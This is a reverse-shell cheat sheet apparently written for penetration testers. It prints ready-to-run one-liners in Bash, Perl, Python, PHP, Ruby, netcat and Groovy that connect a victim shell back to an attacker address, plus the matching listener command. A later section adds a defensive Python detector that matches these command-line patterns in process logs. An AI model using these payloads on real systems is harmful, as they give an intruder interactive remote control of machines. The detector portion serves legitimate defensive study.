A reverse shell provides an interactive command-line interface from a remote machine back to the attacker's machine. This is a crucial technique in penetration testing and security assessments. Below are examples of reverse shell commands implemented in various popular programming languages and tools.
The simplest and most common reverse shell, using Bash's built-in `/dev/tcp` network redirection.
```bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```
A Perl script that establishes a TCP connection and executes a shell.
```bash
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
A Python one-liner to create a reverse shell, leveraging the `socket`, `subprocess`, and `os` modules.
```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
A concise PHP snippet for establishing a reverse shell connection.
```bash
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
```
A Ruby implementation for creating an interactive reverse shell.
```bash
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```
Using Netcat (nc) for both initiating and listening for reverse shells. Note the use of `-e` for execution, which might not be available on all systems.
```bash
# Linux
nc -e /bin/sh target 4444 # or /bin/bash if sh doesn't work
# Windows
nc.exe 192.168.100.113 4444 -e cmd.exe
```
The command to set up a listener on the attacker's machine to receive incoming connections.
```bash
nc -lvnp 4444
```
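A Java reverse shell example, written in Groovy syntax (note the `as String[]` cast). It uses `Runtime.exec` to start Bash, which opens a TCP socket on file descriptor 5, runs each line read from it, and sends the output and errors back over the same descriptor.
```groovy
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```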
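
Seen from the defender's side, the one-liners above share a few command-line traits (a `/dev/tcp` redirect, netcat's `-e`, a socket wired to standard I/O, an interactive shell on an inherited descriptor) that process-creation logs can be searched for. The following Python detector is an added example, not part of the original page; the rule names, the `host pid cmdline` record format, and the sample records are constructed for illustration.

```python
import re

# Hypothetical rule names and patterns (assumptions for illustration, not a
# vendor rule set). Each keys on a trait the one-liners above have in common.
RULES = {
    "dev_tcp_redirect": re.compile(r"/dev/tcp/[\w.\-]+/\d+"),
    "netcat_exec": re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-e\s+\S*(?:sh|cmd)", re.I),
    "socket_to_stdio": re.compile(r"socket.*(?:dup2\(|open\(STD(?:IN|OUT|ERR))", re.I),
    "socket_then_shell": re.compile(r"(?:fsockopen|TCPSocket).*exec.*/bin/(?:ba)?sh", re.I),
    "shell_on_inherited_fd": re.compile(r"/bin/(?:ba)?sh -i\s*<&\s*(?:\d|%d)"),
}

def classify(cmdline):
    """Return the sorted names of all rules that match one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(lines):
    """Parse 'host pid cmdline' records; return (host, pid, hits) for matches."""
    alerts = []
    for line in lines:
        host, pid, cmdline = line.split(" ", 2)
        hits = classify(cmdline)
        if hits:
            alerts.append((host, int(pid), hits))
    return alerts

# Constructed process-creation records (host, pid, command line). Addresses
# come from the RFC 5737 documentation ranges; the last three are benign.
SAMPLE = [
    'web01 4101 bash -i >& /dev/tcp/192.0.2.10/8080 0>&1',
    'web01 4102 python -c import socket,subprocess,os;s=socket.socket();s.connect(("192.0.2.10",1234));os.dup2(s.fileno(),0)',
    'web02 5120 php -r $sock=fsockopen("192.0.2.10",1234);exec("/bin/sh -i <&3 >&3 2>&3");',
    'win07 880 nc.exe 198.51.100.7 4444 -e cmd.exe',
    'web01 4200 nc -zv 192.0.2.20 443',
    'web01 4201 python3 -c import socket;print(socket.gethostname())',
    'web02 5121 bash -i',
]

if __name__ == "__main__":
    for host, pid, hits in scan(SAMPLE):
        print(f"{host} pid={pid} rules={','.join(hits)}")
```

Command-line matching of this kind misses encoded arguments and renamed binaries, so it works best alongside network telemetry, such as a shell process that owns an outbound socket.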